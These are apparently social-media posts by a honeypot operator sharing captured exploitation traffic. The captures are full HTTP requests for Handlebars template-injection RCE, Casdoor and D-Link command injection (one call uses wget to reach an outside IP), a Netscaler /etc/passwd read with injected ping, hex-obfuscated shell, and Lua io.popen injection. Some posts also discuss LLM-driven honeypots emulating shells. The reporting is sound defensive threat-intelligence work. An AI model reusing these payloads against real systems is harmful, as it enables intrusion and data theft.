@virustotal maybe it's worth to look into increasing free quota based on quality of reports. If a source reports a lot of malware with unique signatures then perhaps you don't want to enforce the default quota and miss out on reports (on days where the source is busy).

I bet you already have some sort of usefulness score for sources anyway ?!

#infosec #dfir #security #cybersecurity #virustotal

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937

Here is a full request:

POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}

#dfir #honeypot #infosec #cybersecurity

There seems to be a remote code execution issue in Casdoor? My honeypots are seeing these scans:

GET /api/run-casbin-command?language=exec&args=["enforce","-m","[request_definition]\nr = sub, obj, act\n\n[policy_definition]\np = sub, obj, act\n\n[role_definition]\ng = _, _\n\n[policy_effect]\ne = some(where (p.eft == allow))\n\n[matchers]\nm = r.sub == p.sub","-p","p, x, x, x","sh","-c","id"]&t=2026-03-30T16:12:50Z&m=1191e3dce3682e9382680387ffe783bb87cd213a48f4f1fa6c10644d039f4dc6 HTTP/1.1
Host: x.x.x.x:8000
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15

#casdoor #honeypot #infosec #dfir #cybersecurity

Interesting Netscaler payload caught by my Lophiid honeypots:

GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot

Does anyone know this vuln ?

#honeypot #dfir #infosec #cybersecurity

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

My lophiid honeypots use varies LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 flash and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex and it understood that the resulting string were shell commands that echoed the string "RCE_TEST_123"

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential

#infosec #dfir #honeypot

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=
"

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812.
"

*sigh*

#dfir #infosec #cybersecurity #honeypot